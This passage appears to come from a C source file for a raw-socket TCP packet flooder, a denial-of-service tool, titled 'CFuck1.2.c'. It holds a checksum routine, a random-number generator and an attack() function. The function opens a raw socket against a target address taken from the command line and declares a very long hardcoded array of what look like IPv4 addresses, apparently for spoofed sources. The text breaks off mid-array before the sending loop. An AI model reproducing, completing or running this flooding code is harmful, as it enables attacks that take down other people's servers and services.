CFuck1.2.c -  112KB
#include <stdio.h>
#include <stdlib.h>
#include <netinet/tcp.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>

static unsigned long int Q[4096], c = 362436;

typedef struct pthread_param
{
	int argc;
	char **argv;
};
 
typedef struct pseudo_header
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
    struct tcphdr tcp;
};

unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;
 
    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }
 
    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;
 
    return(answer);
}

unsigned long int rand_cmwc(void)
{
        unsigned long long int t, a = 18782LL;
        static unsigned long int i = 4095;
        unsigned long int x, r = 0xfffffffe;
        i = (i + 1) & 4095;
        t = a * Q[i] + c;
        c = (t >> 32);
        x = t + c;
        if (x < c) {
                x++;
                c++;
        }
        return (Q[i] = r - x);
}


int attack(int argc, char *argv[])
{

    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    char packet[4096];
    struct iphdr *iph = (struct iphdr *) packet;
    struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
	char ip[16];
 
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr (argv[1]);
	
	memset (packet, 0, 4096);

	int class[]= {1746002904,2728317078,2890241442,2728349772,2889962437,1745973041,1746661440,1746246726,1746290759,2890161506,1746342894,1746346497,1746461988,1746711528,1746281058,1746012765,2890093275,1746233015,1746080870,1746023853,1745894187,1746074121,1746202590,1745900231,1745901031,2890377187,1745998251,2728275888,1746090980,2890336158,3324631873,2372236400,2372237121,2890100549,1746371011,1746097522,1745944268,3324635593,3324611338,1746704660,2890077871,2889912358,1746196878,1746524718,2890174702,2728382038,1746219284,1746172646,2889911113,1746449919,1746367882,2890113415,1745884618,1746825743,2890352747,1746374080,2890229463,2728367984,2728268884,1746157566,1746582397,1746894162,2890055257,2890026173,1746002302,1746902369,2890060908,2889919968,2890049858,2890065071,1746631675,1745906532,2889953217,1746236533,2889877886,1746496100,1746904405,1746541598,1746791450,1746726506,1746255651,1746913542,2890091914,1746647027,2728310083,1746483341,1746533395,1746137247,2890162403,2728365922,1746683523,1746082034,2889985170,1746364390,2372232016,2890256161,2728348079,2890267998,2728386057,1745906039,2728266481,1746461656,2889932297,2890096977,2890201019,1746603976,1746885944,2890089036,2890236985,1746496792,1746807285,1746041255,1746063424,2889889539,1746555849,1746428800,1745998930,1746261120,1746183587,1746428344,1746040328,1745888581,3324618568,2890203325,1745985463,1745947420,1746767354,1745881539,2372236902,2890036048,2728374826,1746493900,1746867949,3324609603,2890027976,1745919677,2890107738,2890353702,1746643132,1745975568,1745916914,1746285187,1745905944,2890101351,2890323130,1746519054,1746725550,1746663993,1746547730,2890019648,1746691493,2890388506,1746508128,2890127661,2372233771,1746080476,1746588511,2728340844,2890367075,1746394468,1746566575,2889937441,1745890098,1746731208,1746106179,1746034096,1746479315,2890284898,1746499009,2728263979,2889918431,1746034554,2728272886,1746666593,2890312790,2889903201,2890293137,2890374549,1746718107,1746630498,2889930396,1746266306,1746031124,1746908139,2890031531,1746539177,2890309747,2728340829,1746566031,2890092374,2890328373,2890246900,1746490391,1746762821,1822617003,1746746483,2890017905,1746694721,1746425209,1746332938,2890269586,1746242591,2890147235,2728352705,1746299485,1746701211,1746202489,3193830311,2890374021,1746337740,1746562333,1746735390,2890110256,2890263833,1746121740,2890185518,2890313899,1746464809,1746211015,1745967974,1746215676,1745890358,1746311990,1746085147,2890291835,2890066544,2890171857,1746338879,1746624550,2890130086,1746220659,2890305914,1746209602,2890110610,1746403941,1746026988,1746927183,1746289971,2372238881,2889942639,1746012235,2728344386,1746133082,1746467108,1746893824,1746154058,1746907556,2728295222,1746070442,1746469594,2890391753,1746241940,1746400127,1746192799,1746663261,2728333052,1746735589,1746802769,2890072560,2889930860,1746578954,2890356064,1746922562,1746624977,2889998051,1746814999,2889878372,3324639443,2889975350,1746059668,2728329300,2890355192,2728349916,3324608886,1746752944,2890219798,1746542823,1746572004,1746148713,1745913604,2890272915,1746865372,1746410216,3324619713,2728346436,3324631284,1746589807,1746181533,1746030790,1746684102,1746648499,2889913844,1746755652,1746606347,1746782700,1746587666,1746488137,2889983048,1746863749,2728323067,1746166506,1746209847,1746092689,2890073266,1746412969,2890234631,1746091169,2728352367,1746904967,1746430544,1746767152,2889925028,2889976136,1746463018,2889886276,2890072337,2890105496,1745981635,1746267529,2889984691,1746809897,1746582319,1746235583,1746652283,1746768808,1745976895,1745910521,1746127984,2890234046,3324616584,1746641514,1746370742,2889899283,1746640360,1746142637,1746288182,1746176294,2890077744,1746124669,2728295599,1746354277,1746530172,2890163139,1746643944,2890234713,2890143672,1746481762,1745923634,1746476645,1746847206,2890121600,1746632452,2889885254,2889927280,2889975556,1746326059,2728381465,1746032232,2890036399,2890115839,1746147370,1746705772,1746367461,1746117212,2890386811,1746575604,2890305456,1746498303,1746139368,2890041936,1746509060,1746672036,2890165964,3324626902,3324631652,1745911481,1746289300,1746121252,1746085762,2890351677,2890318575,3324613360,1746605923,2890133751,1746689144,2890019838,2890207269,2890227573,1746370256,1746686418,1746650957,1746275102,1746238603,1746113629,1746135181,1746179974,1746301286,2890014750,2890020588,2890289430,1746556057,2890293426,2890164674,2890187476,2889916571,2890247594,1745880777,3324620549,2890325699,2890266240,2890251413,1746372285,1746869732,2890289799,1746083735,2890110007,1745972831,1745929875,2889883471,1746285675,1745933464,1746771563,1746492647,1746405572,1746716183,2889914140,1746101144,1746522206,1745966101,1822607862,1746024868,1746597071,2728300816,1746522128,1746419848,2890283929,1746587691,1746886383,1746421539,2890071194,1745997421,1746241157,2728386176,1746049561,2889960762,2890098887,2728354122,3324609844,1745913838,2728281703,1746609209,1746790076,1746364697,2889891865,1746170969,1745975978,1746824174,2728332791,1746074037,3324635410,2728330936,2890168850,2890117065,2728384887,2890082872,1746327315,2728388546,1746197888,1746342523,1746064875,1746479090,1746445700,2890367988,1746920300,2890178561,2890057109,1746806371,1746043931,2728322996,1746430085,2890385421,2890274596,1745915486,2890347145,1746910035,1746703775,1746734611,1746225913,1746102934,1746605393,1745906168,2890288442,2889928737,1745960826,1746866896,1746441012,1746748542,1746634094,1745994133,2728363697,1746407336,1746199459,1746096529,2890042155,2890039286,1746336572,2728387158,2890398485,1746664719,1746712178,1746192921,2890018061,1746713214,1746041699,1745905292,2728284667,2889996720,1746016476,1746004361,1746109835,2728312235,1746308939,1745982257,1746014805,2890284469,1746697838,2890061417,2890008803,1746663074,1746389776,2728286373,2890170530,1746372602,2890385316,1746700302,2728292865,1746638914,2890276260,3324627378,2890372790,1746364902,2889883847,1746339600,1746523949,1746476886,1746020372,2728342039,1822619217,1746836048,3193827911,2728291312,1746903567,1745951690,1746380584,1746574914,1746232264,2728372619,2890163919,2890395220,1746321549,1746791214,1746757196,1746652567,1746690952,2890321868,1746156960,1746058123,1746030653,1746169556,1746533390,1746695423,1746873336,2890089006,2889902773,1746104298,2890208470,2728292073,2890082581,1746226131,2890080143,1746221680,2728390047,1746213013,2889954696,2890338337,1746505070,2889931531,2890167790,2372223826,2890008241,1746854350,1746563373,1746562347,2890085034,1746834948,2918527951,1746007379,1746875102,1746130319,1746301979,2889898327,1746787800,1746479323,1746399931,2890269501,1746920002,1746697875,2890202085,1746456170,2728349952,1746862609,1745949070,1746719649,1822613254,1746848928,1746613974,1746584123,1746484227,2889924016,1746190679,1746054148,1746632957,2890071724,1746572500,2728304512,2890169353,2889877325,1746414034,1746636625,1746427303,2372235861,1746831751,2918529404,1746708012,2889982127,1746185694,1746549571,2728380007,2890259989,1822618742,1746360312,1746387151,1746199249,2890107778,2890191155,2728272529,2890068101,2728337565,1746801510,2889934036,1746919685,3324626770,1746281112,1746125485,3324636976,1746230274,1746445503,2889989403,2728363458,2918529310,1746070161,2890040367,2372232034,1746227057,1746371105,2889965091,1746245445,2890348105,1746313426,1745909209,2890310945,1746368936,1746808330,2889906736,2890350103,2728266173,1745986743,1746904351,1746139863,2372226413,1746240753,2890359838,1746895198,2728286394,1746332685,1746558716,1822620744,1746650931,1746106411,1746537091,1822620834,2889959614,2890194333,2890380657,1746716812,1746033144,1745928526,2890255791,2890273686,2889943762,1746770564,1746759609,2728328165,3324610612,1746774323,1746317554,1746488669,1746598131,2890231811,2728352215,1746879141,2890074809,1746591017,1822607350,1746007855,2728279829,2890153826,1746925059,2889933110,2890174801,2889940658,1745978547,3324609219,1746441859,2890152847,2728382383,1746190960,1746122501,1746862252,1746112227,1746294782,1746526184,2890052893,1745962662,1746880579,1746170637,1822615507,2889988101,1746288021,2890048278,2890298307,2728335266,1746855778,1746426156,1746650216,2890264621,1745942040,1746067712,1746723280,3161612865,2890324187,1746604721,1746894463,2890227950,1746621769,1745987452,1746416667,2890260583,2890289117,1746178593,1746916044,1745916688,1745916766,1746825341,2890115329,2890275806,2889978296,1745991944,1746924826,2890238196,1746825712,1746352916,1746012614,1746252511,1746922148,2890192347,2889958816,2890157638,1746139990,2890242578,2890169226,1746426467,3324621669,2889948790,1746592835,1746501718,2890195410,1746886306,2890129750,2890050626,1746476023,1746302789,1746808060,1745903202,1746304715,1746216769,2889926296,1746243330,2890164580,1745956585,2890270850,1746257497,1746466863,2890065814,1746581777,2890056618,2890373617,2728336947,2728311220,1745904252,1746355227,2889901394,2890229075,2889958563,1746262612,1746917113,1746848359,2890130671,2890111266,1745996600,2890223061,2890014316,1746407709,1746183876,1746583142,2890299146,1746544128,2890292465,1746127645,1746178784,2890372461,1746704162,2890278773,1746023129,1746351697,2890018049,2890024265,1746884887,1746720316,2890390321,1746856079,2890368286,2890303205,1746220709,1746559045,1746375994,3324619940,1746072817,1745897573,1746091521,1745961367,1746834187,1746068837,1746332752,1746157436,1746204281,1746477470,1746118832,2372228680,1746146720,1746771311,2889907636,1822620752,1746518267,2890257831,1745941678,3324639970,1746581870,2728326164,1822608248,1746380863,2890321460,2890338226,1745972350,1746885413,2890095131,1746332936,1746075929,2890233826,1746820227,1746032031,1746670911,1746498973,1746128431,1746752980,2889884441,1746609934,2890127491,2890247447,2889909775,1746150785,2890312568,2890286866,1746061320,2890196345,2890154625,1746406454,1746748547,1746175542,1746755195,2728304204,1746196397,2890177567,1746031428,1746037789,2890326131,2890367298,1746162587,2889950460,2889891435,2889972718,1746249041,1746137506,1746402765,1746599419,1745985949,1746657559,1746818086,2890003711,1746164694,1746230736,1746798381,1746420510,1746818821,1745891235,1746526520,2890370513,2890122941,2889940073,1746306352,1746508539,1746120083,1746912455,2890146397,2728284177,2890075557,1746056065,2728285780,1746337873,2889946361,1746832254,1746727236,1746072129,1746542311,2889911240,1745966188,2728347762,2890210366,1746865085,2889986214,1746051957,1746858651,1746474643,2890071018,1746709294,1746270154,2890155263,2890120770,1746638800,1746077944,2890103522,1746121606,2890260480,1746313359,1746452697,1745969971,1746876334,1746587059,3324633252,2890324859,1746127148,2890235144,2728327456,1746116428,1746857318,1746500108,1746701814,2890195893,1746072342,2728340452,1745921174,1746809348,1746153206,3320508754,1746218050,1746365437,2728277898,1746231949,2890042215,1746317252,1746381351,1746418087,1746394278,1746632891,2889923985,2890146209,1746088070,2889940088,1746140450,2728328947,1746336563,1746045177,2890091617,1746394670,2890114796,2890283080,1746548330,2728291317,1746746515,1746326903,2890198828,1746013748,1746612401,1746529113,2890048170,2890175830,1746411516,1745891778,1746885998,1746230431,2890246848,1746274390,2890194899,1745981962,1746730873,1746172935,2890242888,2890346801,1746401554,2890031421,2890245954,1746319385,2889998565,2889974887,3161613247,1746476864,2890387001,2728297230,3324635591,1746566380,2890077235,1746773733,2889880644,1746876201,1746325231,1746894932,2890270719,2889950911,1746841656,2890058262,2728325022,1746532441,2889916875,1746338740,2890089228,2890386209,1746443860,1746008626,1746919787,1746089753,1746644807,2890034298,2890110030,1745981901,1746696981,1746442618,2890324679,1746251154,2890109936,2890310137,2890218332,2890089740,2890371320,2728272238,2889901434,2890043376,1746805845,1746437285,2890239581,2889980630,1746453182,1745881360,2890289079,1746251687,2889930522,1746519819,1745968038,1745991718,1746424555,2890150820,1746320309,2890322630,1746282648,2889968275,1746409881,2890204989,2728352792,1746847009,2890129407,2890213657,2728345506,2728338894,1746729592,2889949881,1746588575,1746722647,2890105637,1746874460,1746789049,2890301435,2889895444,1746613803,1746038573,1746203570,1746393984,1746162481,1745921132,1745906925,1745896149,1746552122,1746426034,1746908173,2728319096,1746635533,1746229066,1746519511,2890065407,1746235332,2889966775,1746106777,1746167379,1746531307,2890213394,1745922631,2890217517,1745952731,1746190326,2890181617,1746858397,1746576062,2890210176,1746686386,1746002970,1746222838,1746830167,1746895702,1746040038,2890189677,2890109135,1746600885,2889913663,2889965528,1746355476,2890198359,1746869812,2890065655,1746779511,3161614968,2890035862,1746835974,2889959931,2890038713,1745928408,1746277992,2889892104,1746273216,1746274108,2728310746,2890101912,2890160855,2890374197,3324627226,1746012991,1746788513,1746802491,1746667138,2890364230,1746048338,1746252891,1746300146,2890048233,1746441647,2890218840,2890159815,2890374472,1746856654,1746881436,2890014352,1746360153,1746364092,1746284208,1746066383,2890225923,2890024999,1746652600,1746921922,1746734412,1746385128,1746284722,1745884801,1746390640,2890110041,1746403954,3324626647,1746632156,1746389640,1746143282,1746162207,2889899569,1746294588,1746136639,2889905145,1746866146,1746069283,1746193954,2889953064,1746904783,1746007403,1746788319,1746012357,2890161364,2890318799,2890011177,2890150798,2372229374,1745986568,1746807212,1745929708,2889926790,1746779025,1746873934,1746070866,2728304562,2890337309,1746602751,2728281644,1746533546,2372235966,1746902811,1746674102,2728358761,3324616488,1746910201,2890169083,2728268042,1746654466,2890161613,1746311212,1746143210,2890303143,2889992794,1746241721,1746685760,2889996319,3324628245,2890308567,1745954640,1746125314,1746092036,2890358048,2890003880,2890208212,1746259337,1746395432,1746696147,1746678408,2890106407,1746568341,2890180690,1746016221,1746133386,1746086066,2728289444,1746910728,1746785318,1746332614,1745893646,1746903887,1746370210,3161614794,1746064479,2890269333,1746539954,1746604156,2890154211,1746461500,1746699201,1746881048,1746569886,2889996182,1746536872,3324624147,1746169235,2889933933,2728306731,1746412386,1746656899,2889957296,1746109257,2890345855,1745895550,2728365970,2728330891,2890076220,1746611869,2889916505,2728312503,1746498041,1746147858,1746762175,1745892246,1746622621,1746356742,1746073261,3324622558,1745929271,1746785108,2890074762,1746449689,2890132006,2890148779,2890238215,2890324929,1746076609,1746515851,1746112888,2889926536,1746529556,2890316284,2890101572,1746550493,1746916936,1745928567,1746485335,2890027074,2890027957,1746570562,2890281731,2890372701,1746544049,2890133794,1746272994,2890200638,1746595981,2890073555,2728351072,2728310973,2728315027,1746163948,2889940756,2890199162,3324612237,1746423911,1746000954,1746130130,2890346859,3324639917,1746462059,1746676975,1746416897,1746750524,2889954660,2728319624,2890021084,1746016682,1746562369,1746323137,1746220154,2890108289,1746412353,2890239474,1746735829,1746483110,1746415307,2728311717,1746660136,1746173944,2728319524,2889982814,1746124628,2890337426,2728281270,2890309082,2889948312,2890273275,1746352304,3324615531,2728322001,2890268727,2890128302,1746579098,1746068312,2889951421,2890148356,2890393986,2889996455,2890201453,1746569181,2372225670,1746519644,2890328920,1746295059,1746897375,1745995669,1746264319,2890371621,1746166644,1746647803,1746011462,1745934323,1745960253,2889935411,1822617456,1746562124,3324615276,1746401210,2890004538,1746333652,2372226567,1746249884,1746253757,2890065583,2890269209,1746413661,1746388474,2890085227,1746172286,2889936840,2890200757,1729492640,1822608152,2728301976,2728382005,1746411037,1746233067,1746080938,1745942223,1746499732,1746419067,2889895946,1745982138,2890155651,1746688297,2890304551,1745969941,1746355524,1746453278,2889978497,2890106752,1745898529,1746858150,2889977684,2890131990,1746880758,1746462445,2889962116,2728266488,1746773041,2890100525,2890280741,2890292551,1745948322,1745942832,2890141831,2728363489,1746522223,1746224178,2728350914,1746595099,1746406649,1746391318,2890386198,1746804767,2728295549,1745889413,2728374428,2890150326,2890384242,2728381639,1746606265,1746779981,1746247646,1746459842,1745883209,1746714706,1746047893,1746158203,1745905849,2890397184,1745957899,1746336870,1746350435,2728293970,2728317866,2890353390,1746311011,1746770178,1746264320,1746353328,2889924586,2890058353,1746801514,2728290607,1746755450,2372229551,1746526695,1745937998,2890373239,2890139500,2728348322,2890177681,1746254630,1746026007,2890117668,1746333251,2728286738,1746624173,2890345587,1746797316,2890315001,1746113884,2890146012,1746629186,1746695870,1746185031,2728310731,1746107232,2889898175,1746415368,1746623894,2890314524,1746319562,1822610204,1746132276,1746585800,1746411055,1746094285,1745978874,1746625007,2889889109,1746912294,2889951282,1746223532,2918527266,1746705208,2890288133,1745956679,2890251374,1746191444,1746006311,2889942740,1746377535,1746341930,2890214911,1746462453,2890139798,1746148587,2890153670,1746434670,1746447759,1746073738,2728376899,2890057527,2890195475,1746560962,1746245295,1745955868,2372236633,1746509796,3324628400,1746581174,2728376232,2890351504,1746886199,1746512096,1746670485,1745897520,1746404828,3324617341,2890249396,1746375693,1746093591,3161612404,2889885688,1745969413,1746063764,2889966603,2890389085,2890243260,1746854426,1746780830,1746627278,2889998699,2889920739,1745962328,2890275299,2890250186,2728383477,1746637232,1746221385,1746583944,1745970227,2890295785,3324634081,2890129830,2728388560,2889948195,2889918401,2889970480,1746187235,1746875505,1822618128,1746867189,1746237976,1746391161,1745955806,2889967286,2890311045,1746914017,2372235635,2890235725,1746591233,2890094148,2889923609,2890290226,1746362730,1746388637,2728380979,2890109996,2889973312,1746287331,1746052363,1746554861,1746873194,1746703702,2890039406,1746544485,1746724979,2890248535,1746017010,2890025646,1745929013,1746475650,1746178665,2728382617,2728328707,1746232476,2728393706,1746370226,2889934152,1746450866,1746618521,2728315752,1746507987,1746434817,1745954980,2890001272,2728325751,1746885908,1746588724,2890007327,2728385673,1746448899,2890146150,2890291897,2890193534,1746299811,1746006876,1745979415,2728391209,1746034501,1746641722,1746855190,2889987298,2889970242,2890333445,2890216159,1746480399,1746338320,1746846897,1746359929,1746221440,1746632275,1746736280,2890026366,2890100429,1746887472,2728356851,1746839763,1746822480,2890053085,1746088055,2890281134,1746026176,3161615834,1745972380,2728266924,1746344378,1746369427,2890352329,1746403809,1746835957,2890232714,1746535921,2890189692,2889964563,1745997242,2890092195,1746276440,1746049876,2890011458,1745986715,1745995899,2372233786,1746655880,1745999860,1746679343,1746881894,2890336707,1746033687,1746898210,1746242200,2889963618,1745957573,1746082231,1746618632,2728294050,1746715950,2890370365,1746413442,1746289047,1746877883,2890374565,1746889501,1746141202,1746138089,2890105023,1746815156,2889970933,1746059501,1746285285,1746567380,2728314534,1746632602,1746088016,1746207137,1746766259,3324635585,1746258436,1745911341,1746146365,1746829784,2889921651,1746081247,1746711859,2890042678,2890077854,2890334785,1746321195,1745990751,1746230765,1746613296,2890374012,1746899568,1746092772,1746471709,2890016369,1746480504,1746166010,2890334608,2890082201,1746269263,1746488845,1746242148,1746734739,1745939677,1745956993,2890101401,1746165673,1746174328,2890041235,1746192964,1746737869,1746873013,1745889375,1746614731,2890198195,3324636087,1746136223,1746349663,1746804028,2890084999,1746754320,2890116885,1746314138,1746265323,2890011727,1745965054,2890284882,1746366787,1746223403,1746623294,2890064943,2889986182,2889913471,1746445902,1746578648,2890220154,3324631694,2890242151,1746538250,1746338607,2890145132,2728325109,1746100602,1746281961,1746599098,2728299732,1746637285,1746717718,1746488534,1745905037,2728335558,1746420637,2890093044,2890192379,2728328887,1746616814,1746235007,1746661237,1746895146,1746321073,2890175177,1746327580,2889893929,1746112322,2890219904,1746277219,1822620174,1746703113,1746557157,1746028648,2889969453,1746470534,2889955943,1822619866,1746856394,1746534440,2728287690,1746660108,1746826731,3324615063,1746683733,1746580798,2890287240,1746778673,2728326008,1746555991,1746344493,2890114301,3193830737,2728287771,1746700232,1746706370,1746232912,2372238672,1746476236,2889922375,1746925157,1746371296,2890299918,2890362531,2890378796,1746234702,1746706652,1746415915,1745915872,1746521675,2918529654,1746618539,3324631817,1746781654,1746135525,1745969703,1746517626,2728367296,1746536660,2889991322,1746638437,1746106507,2728277840,2890089546,2728288356,1746698725,2728274296,2728289568,2890094688,1745995071,1745919493,2728315404,1746131813,2890395559,2890139429,3324628566,2890089646,1745911784,2890235086,1746053899,2890013550,2889988539,1746743227,2890113635,2890116382,1746121758,2890285330,2889982083,1746386048,1746731020,2372227236,1746700553,2890340135,2372228197,2890054942,2890306802,1746282331,1746145858,2890043285,1746254426,2889901920,3324630038,2728325903,2890071945,1746408766,1746403073,1746921337,2890240225,2890342753,1746868408,1746767361,2728314898,1746459809,2889990199,2728348597,2728355356,2890359102,1730085928,1746593356,2728275569,1746840227,1746432462,2890082796,2890385883,1746467533,2890058055,1746126998,1746785214,1745935564,2890017778,2890167647,1746695797,2890121479,1746776122,2889919237,1746174051,2890218554,2728354023,1746324042,1746910278,1746458421,1746495510,1745919584,1746853700,1746166314,2728365549,2889952153,2890372710,2890312384,1746399200,1746794489,1745949988,1746897906,2728349639,2890097939,1746163410,2890181532,1746035993,3324612892,2890351930,1746414016,1746576951,1746631657,1746172190,1822611091,1746398978,2890072380,1746403733,2890093701,2728377202,2889992604,1746882242,2890072707,1746657343,2889889482,2890154444,1746233728,3161612669,1746272609,1746569829,2890143477,1746705479,2890269980,2918527229,1746084592,2890161200,1746467224,1746159191,2890308406,1746788385,1746217271,2728379617,2890252311,2890113190,2890041074,2890107476,1746223718,1746775052,2890299400,1746406530,1746575488,1746279548,1746641457,2728389501,2890292796,3324632722,2890158522,1746803817,1745998860,1745994749,2890372980,2889886423,1746405847,1746884763,1746452943,1746870957,2890240087,1746274349,1746023888,1746523181,1746000155,1746046181,1746693797,2890295599,1746177325,1746709488,1746827118,1746110281,2890369727,2728275307,1746529689,2890332520,2889877806,2889939043,1746924341,1745893579,1746198936,2728276648,1746570568,1746613148,2890100811,1746449325,2890324192,2890370421,1746306615,2890329152,1746210564,1746552542,2890106220,1746258486,1745979800,1745939709,2889900129,1746446547,1746383144,2890099991,1746013488,1746037345,1746064248,1746865193,1746485833,1746480699,2890258700,2918529901,1746050032,1746066227,1745928981,3324635466,2728379369,2890288909,2890321764,1746671070,1746151788,1746250364,1746709937,2890129291,1746719253,1746424333,1746062240,2889900108,3324618365,2890043758,1745926020,1745884764,2889911965,1746282627,2890262885,2890130205,1746709434,1746261176,2728378509,2728377277,3324614177,1746716897,1746871971,2889943898,2890311463,1746782470,1746658975,2890084452,1746371527,2889957752,2890372656,2890139156,1822607454,1746640030,1746561426,2890277877,1746385150,2728369596,2889929135,2890068036,2890045536,1746257476,2889907720,3324611217,2728277716,1746359161,2890023902,1746458038,2890254826,1746104962,1745967057,3324628182,2728381033,2889894712,2890181296,2889990537,1746329205,1746642731,2728366043,1746149915,2890357643,2728338201,1745898220,1745903195,1745892632,1746074220,1746114749,1746327269,2890228363,1746499827,2889974398,2889906310,1746233853,2890256135,1746826807,1746223139,1746076657,2728344269,1746799315,1746267542,1746082733,1746810345,2728369897,2889955520,1746094238,1746764275,1745907221,1746224686,1746398567,2889893299,1746765885,2728370474,1746220780,2890344279,1746196691,1745886314,2890333392,1746670907,2890131621,2728330032,2890060229,1746662692,1746159289,1746178702,1746857412,1746311976,1746860948,1746698844,1746764952,1746210039,1746058106,1746049694,1745993846,1746241135,1746480467,1746615304,1745981004,1745929290,1746045792,1746708626,1746826610,2890200879,1746634981,2889985341,2890230802,1745947074,1746625114,1746439908,1746507937,1746359203,1746859199,1746548742,3324618344,1746707593,2889881556,2890329293,1746454820,2889988578,2890062506,1746876296,2890212036,1746793341,1746168562,1746581531,2890123080,2890046384,1745937286,2890188519,1746341378,2890127158,1746642300,1746456643,2890324078,1746212079,2728350533,1746708090,2889974006,2889948289,1745887385,1746033459,1745883408,1746284527,1746409518,2889933394,1746044161,2890165324,2889983894,2889890141,2889887354,2890071815,1746686666,1746091172,1746289835,1746208435,1746559248,1746435545,1746532558,1746360906,2889891966,1746517299,2889947508,2889961299,1746360915,1746297215,1746685915,2890136464,1746717942,2889885213,2890291067,2890236537,2890032685,1746582261,1746161829,1746897657,1746075401,1746850018,1746224610,2728380086,2890145175,1746576935,1746750298,2728302446,1746781318,1822610983,1746849697,1746898856,1746501117,1746725354,1746468200,1746286570,1746443334,2890112006,2890078617,2728382904,1746459440,1746093581,2889947593,1746085377,1746725840,1745957800,1745960051,1746659167,1746133392,1746293765,2890146841,2728319213,1746131023,1746062210,2890339331,1746662484,1746311654,2890119491,1746892530,1746076111,1746048896,1822617075,1746046257,1746919816,2890002254,1746495465,2890245313,1746060290,2889962787,1746778087,1746732404,2890048355,1746077553,1746600423,1746400899,2890268690,1746420541,1746571691,1746529915,1746041273,1746025703,2889909537,1745939754,2728378470,1746233061,2890018319,2890348799,1746603000,1746311780,1746459200,2890008884,1746445922,1746122901,1746670723,2890305245,2890306072,1746391066,2889901972,2372229727,1746088493,2890270417,2890082961,1746426693,1745974516,3324629198,1745949600,1745935631,1746186228,1746232576,1746467960,1745890860,2890359966,2889900450,2728383754,2728271041,3193830787,2889910478,1746236214,3193828043,1746267531,2890120161,2889990009,2728353657,2890254299,2728330059,1746737240,1746452379,1746149778,2890248432,2890207038,2890259497,1745885435,2890059311,1746180581,2890168982,2889995229,2890246191,1746479403,2728385207,2728297686,1746495092,3324633753,2890315776,1746914381,1745942768,1746828970,1745936226,1746781055,2889884463,1746140569,2728297049,1746356396,2728276508,1746025753,1822609055,2890074579,1746739358,1746131100,1746349632,1746307245,2890330884,2890239866,1746442185,1746694682,2890231575,2890036689,2890297332,1746106612,1822608884,1746218682,2889900671,2890399543,2890192521,1745909388,1745945829,2728380589,2728349375,1746335832,2890329027,2890097381,2889879050,2890326862,2728291975,1746542917,1746419217,2890376293,1746673449,2890281325,1746092225,1746690756,1746920646,1746460131,2890034777,1746353899,1746579318,1745909639,2890217895,2889939361,2890235112,1746355884,2890249977,1746859579,1746204237,2890330829,1746886036,1746110163,1746243823,2889883111,1746015344,1746764490,2890113072,1746646400,1746693375,2889967068,1746491656,1746221214,1746443947,1746700712,1746495983,1746313539,1746848384,2890032758,1822613785,2728369212,1746860687,1745974259,2890062022,2890006371,1822619428,2728307208,1745881318,2889944050,1746420618,1746242112,1746114395,2890346948,1746274584,1746525367,2890224528,1746321948,1745931130,1746038380,2889940030,2890324331,2890248831,1746365566,2889970723,1746602069,1746796901,1746651177,2890396714,2890263184,2890118376,1746595470,1745912061,1746120608,1746301110,1746254620,1745922421,1746623510,1746819987,2890101715,1746847620,2890229304,1746354511,2890220244,2890160724,1746362271,1746310009,1746666239,1746001671,1746183081,1746061519,2728394617,1746482094,1746530771,2890270478,2728359233,2890116114,2728377572,1746731388,1746160903,2889889102,2890352883,2728334464,2890185918,2890074481,2890144377,1746221144,1746735685,2890024969,1746787223,2890151303,2728386139,2728358353,1746700727,1746915184,2890157620,1746551208,2890078381,1746821340,2728343504,1746599950,1746773776,1746236939,1746590986,1746561015,2197834141,1746388356,2890000601,1746136239,1746173723,1746368575,1746599384,2889940936,2890059827,2890281883,2890388207,1746386775,1746293698,2890020791,2890324526,1746807523,1746514997,1746053465,1746366901,2890092836,1746806354,1746256029,1745989821,2890038529,1746867074,1746622276,2890130834,1746846495,2890096557,2728295788,2890062501,1745988979,2890250860,2890115415,1746767937,2890313434,1746415828,2889918971,2890380095,2890103668,1746576744,1745931140,1746487677,1745958999,1746118609,1746873997,1746759561,2728264387,1746615974,1745895344,1746770150,1746747344,2890333228,1746142698,1746026968,1746915912,1746487913,1746504926,2728368059,2890033753,1745903356,1746615383,2728386755,1746063303,1746880394,1746216626,1745934571,1746898939,2890040667,1746397376,1746620930,2890284121,3324638873,1746051950,2890057947,1746817101,2890140057,2890115463,1746782705,1745960955,2890057634,2889956568,2890036669,1745893374,2890336030,2890155388,2889980250,2890248403,2890375060,1746026759,1746450800,1745997810,2889998501,1746859062,1746476621,2728332083,1746059444,1746622164,1746853709,2890347509,2890393633,3324611983,2890391514,1746779690,2890206266,3324621101,1746776468,1746382896,1746036903,1746440136,1746013767,2372237130,2890127368,1746083704,2728278571,2728313625,1746497765,2889914343,1746733604,2728388705,2890300948,1746906430,1746276733,2890238485,3324634603,1746268323,1746641166,1746499567,2890134319,1745925861,1746760946,2890211253,2890056270,1746265352,2890022140,2890369659,1746683419,1746606755,2889908319,1746831739,2890026445,2728362166,1746886205,1746171307,1746860490,1746469512,2889971510,1746897207,2890361158,1746502599,1746113146,1746640558,1745881685,2890026661,1746144263,2890204494,1745924827,1746279753,1746187444,2890228458,1746921678,2890363595,1746097543,1745982518,2728329951,1746141882,1746171364,1746538612,1746335737,2890103625,1746244702,2890144746,1746237036,2372233094,2890256871,3324620251,1746101486,2890161735,1746310304,1746625613,1822611211,1746907630,2890263487,2890005227,2890181312,1746712860,1746729749,1746099096,1745892705,1746532569,1746918334,2890034573,2728390840,2889940669,1746608433,2890090524,2890090124,2728345548,1746866001,2890051200,1746573151,2890322469,2728288724,2728353309,1746417096,1746537013,2890337944,1746550759,1746565268,1746764704,1746256965,1745925123,2890020332,1746437005,1746182366,1746284592,1746523645,1746695895,1746535463,1746440065,2890083149,1746732997,2890195348,1746281810,3324635965,1746207539,2890116232,1746016648,1746413756,1746549745,1746544058,1746403822,2890374072,1746104647,1746541227,2728379759,2728374574,2890128418,1746217626,2890015317,1745929949,1746565981,1746711013,28899801